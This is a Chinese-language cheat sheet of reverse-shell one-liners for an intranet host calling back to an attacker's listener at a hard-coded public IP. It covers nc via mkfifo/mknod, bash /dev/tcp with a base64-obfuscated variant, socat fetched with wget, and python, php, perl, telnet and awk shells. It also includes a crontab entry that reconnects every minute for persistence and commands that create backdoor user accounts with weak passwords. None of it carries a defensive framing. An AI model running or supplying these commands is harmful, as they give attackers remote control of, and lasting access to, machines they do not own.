nc反弹
当nc没有-e选项的时候
vps先监听
vps:nc -lvp 2333
内网主机:
rm /tmp/f -rf;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 123.57.62.22 2333 >/tmp/f
或者
mknod backpipe p; nc 123.57.62.22 2333 0<backpipe | /bin/bash 1>backpipe 2>backpipe
nc 存在-e选项的时候
vps:
ncat -lv 2333
内网:
nc -e /bin/bash 123.57.62.22 2333
bash
vps:
ncat -lv 2333
内网主机:
bash -i >& /dev/tcp/123.57.62.22/2333 0>&1
或者base64编码:
bash -c {echo,IGJhc2ggLWkgPiYgL2Rldi90Y3AvMTIzLjU3LjYyLjIyLzIzMzMgMCA+JjE=}|{base64,-d}|{bash,-i}
socat
vps:
socat TCP-LISTEN:12345 -
内网:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:123.57.62.22:12345
内网主机没有socat时候
wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat
chmod 755 /tmp/socat
/tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:123.57.62.22:12345
脚本语言:
vps:
nc -lvp 8080
内网主机:
python:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("123.57.62.22",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
或者
python -c "import pty;pty.spawn('/bin/bash')"
php:
php -r '$sock=fsockopen("123.57.62.22",8080);exec("/bin/sh -i <&3 >&3 2>&3");'
perl:
perl -e 'use Socket;$i="123.57.62.22";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'
telnet:
vps:
nc -vlp 1080 命令结果显示窗口
nc -lvp 8080 命令传输窗口
内网:
telnet 123.57.62.22 8080 | /bin/bash | telnet 123.57.62.22 1080
或者
mknod test p && telnet 123.57.62.22 12345 0<test | /bin/bash 1>test
awk:
vps:
nc -lvp 12345
内网:
awk 'BEGIN{s="/inet/tcp/0/123.57.62.22/12345";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'
crontab:
vps:
nc -lvp 12345
内网:
(crontab -l;printf "* * * * * /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("123.57.62.22",12345));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
")|crontab -
针对交互式不友好
一句话增加用户
useradd newuser;echo "newuser:password"|chpasswd
例:useradd guest;echo 'guest:123456'|chpasswd
useradd -p encrypted_password newuser
例:useradd -p `openssl passwd 123456` guest